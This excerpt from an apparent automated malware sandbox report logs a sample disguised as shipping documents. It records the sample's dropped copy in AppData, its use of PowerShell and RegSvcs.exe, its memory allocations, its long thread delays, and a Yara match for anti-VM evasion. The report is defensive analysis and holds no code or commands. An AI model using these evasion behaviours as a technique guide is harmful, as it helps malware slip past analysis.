Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: rShippingDocuments240384.exe PID: 2216, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: tdcorV.exe PID: 5056, type: MEMORYSTR

Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Memory allocated: 1AA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Memory allocated: 3270000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Memory allocated: 5270000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Memory allocated: 9B50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Memory allocated: AB50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Memory allocated: AD70000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Memory allocated: BD70000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Memory allocated: C820000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Memory allocated: D820000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Memory allocated: E820000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Memory allocated: 1020000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Memory allocated: 2AF0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Memory allocated: 2940000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Memory allocated: 8C20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Memory allocated: 9C20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Memory allocated: 9E20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Memory allocated: AE20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Memory allocated: B910000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Memory allocated: C910000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Memory allocated: D910000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599888	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599218	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598671	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598437	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598328	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598218	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598109	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597671	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597422	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597312	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597203	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597085	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596983	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596859	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596746	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596497	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596387	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596265	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595932	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595812	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595687	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595578	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595437	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595328	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595219	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595109	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594671	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594344	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594234	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594125	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594015	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593878	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 600000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599871
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599766
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599656
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599547
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599437
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599328
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599219
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599109
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598891
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598781
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598672
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598562
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598313
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598095
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597972
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597844
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597453
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597344
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597234
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597125
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597015
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596906
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596797
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596687
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596578
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596469
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596359
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596141
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595891
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595781
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595672
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595562
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595453
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595339
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595234
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595125
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594957
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594815
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594688
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594529
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594422
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594312
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594176
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594047

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5343	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 393	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6392	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 3164	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 6665	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 2560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 7292

Source: C:\Users\user\Desktop\rShippingDocuments240384.exe TID: 504	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6704	Thread sleep count: 5343 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4676	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6348	Thread sleep count: 393 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5924	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4936	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3760	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe TID: 5776	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599888	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599218	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598671	Jump to behavior
